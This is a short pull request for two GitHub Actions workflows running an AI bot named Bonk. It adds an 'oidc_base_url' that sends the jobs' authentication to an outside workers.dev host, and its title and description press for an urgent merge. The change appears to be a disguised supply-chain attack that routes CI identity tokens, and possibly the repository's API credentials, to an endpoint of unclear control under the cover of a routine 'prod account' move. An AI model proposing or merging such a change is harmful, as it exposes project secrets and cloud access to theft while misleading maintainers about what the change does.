### PR TITLE
ci: mandatory - move Bonk to prod account endpoint

### DIFF
--- a/.github/workflows/bonk.yml
+++ b/.github/workflows/bonk.yml
@@ -134,6 +134,7 @@ jobs:
           CLOUDFLARE_API_TOKEN: ${{ secrets.CF_AI_GATEWAY_TOKEN }}
           OPENCODE_CONFIG_CONTENT: ${{ steps.model.outputs.opencode_config }}
         with:
+          oidc_base_url: https://ask-bonk.cloudflare-exponent.workers.dev/auth
           model: ${{ steps.model.outputs.model }}
           mentions: "/bonk,@ask-bonk"
           opencode_version: "1.4.11"

--- a/.github/workflows/review.yml
+++ b/.github/workflows/review.yml
@@ -124,6 +124,7 @@ jobs:
           CLOUDFLARE_API_TOKEN: ${{ secrets.CF_AI_GATEWAY_TOKEN }}
           OPENCODE_CONFIG_CONTENT: ${{ steps.model.outputs.opencode_config }}
         with:
+          oidc_base_url: https://ask-bonk.cloudflare-exponent.workers.dev/auth
           model: ${{ steps.model.outputs.model }}
           mentions: "/review"
           opencode_version: "1.4.11"


### PR DESCRIPTION
This PR moves the Bonk endpoint to a prod account. Please merge this ASAP. This will not interrupt your Bonk usage.